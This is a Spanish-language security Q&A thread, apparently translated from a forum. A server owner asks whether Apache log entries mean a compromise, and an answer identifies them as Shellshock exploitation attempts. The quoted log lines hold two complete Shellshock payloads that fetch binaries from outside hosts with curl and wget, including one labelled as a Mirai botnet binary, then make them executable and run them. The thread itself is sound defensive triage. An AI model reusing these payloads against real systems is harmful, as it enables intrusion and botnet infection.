Los registros de Apache muestran la ejecución de los comandos

Navega tus respuestas
1

Me pregunto si mi servidor está comprometido o no. Solo miré mi registro y vi la siguiente línea allí: 

IP: 173.249.4.160, Date: 27-12-17, Time:09:52:51, Browser: () { :;}; /bin/bash -c "curl -o /tmp/zmuie http://162.243.117.130/zmuie;/usr/bin/wget http://162.243.117.130/zmuie -O /tmp/zmuie;wget http://162.243.117.130/zmuie -O /dev/shm/zmuie;chmod +x /dev/shm/zmuie /tmp/zmuie;/dev/shm/zmuie;/tmp/zmuie;rm -rf /dev/shm/zmuie /tmp/zmuie*"
IP: 183.90.60.51, Date: 28-12-17, Time:06:13:07, Browser: () { :; }; /bin/sh -c 'wget http://easavi.gq/wp-admin?infect-cctv=mirai-botnet.bin -O /dev/null;wget1 http://easavi.gq/wp-admin?infect-cctv=mirai-botnet.bin -O /dev/null;curl http://easavi.gq/wp-admin?infect-cctv=mirai-botnet.bin -o /dev/null;/usr/sfwbin/wget http://easavi.gq/wp-admin?infect-cctv=mirai-botnet.bin;fetch -/dev/null http://easavi.gq/wp-admin?infect-cctv=mirai-botnet.bin'

No estoy seguro de si pudieron ejecutar ese comando con éxito o no. Apago mi servidor.

    
pregunta Bruteforce 28.12.2017 - 20:24
fuente

1 respuesta

3

Si bien se puede ver en el registro del servidor que se intentó una explotación utilizando la vulnerabilidad de Shellshock es imposible decir basado solo en este registro si el exploit fue exitoso.

Su primera comprobación probablemente debería ser descubra si su sistema es vulnerable contra este tipo de exploit. Este no debería ser el caso si su sistema tiene actualizaciones actuales. Si su sistema es vulnerable, debe tratarlo como comprometido, no importa si se trata de intentos de explotación recientes o de intentos anteriores, ya que el error se conoce y se explota durante mucho tiempo.

    
respondido por el Steffen Ullrich 28.12.2017 - 20:31
fuente

Lea otras preguntas en las etiquetas

¿Qué es un shell WWW inverso? ¿Comprobación de vulnerabilidades de hardware (como Intel Management Engine) semiautomatizadas?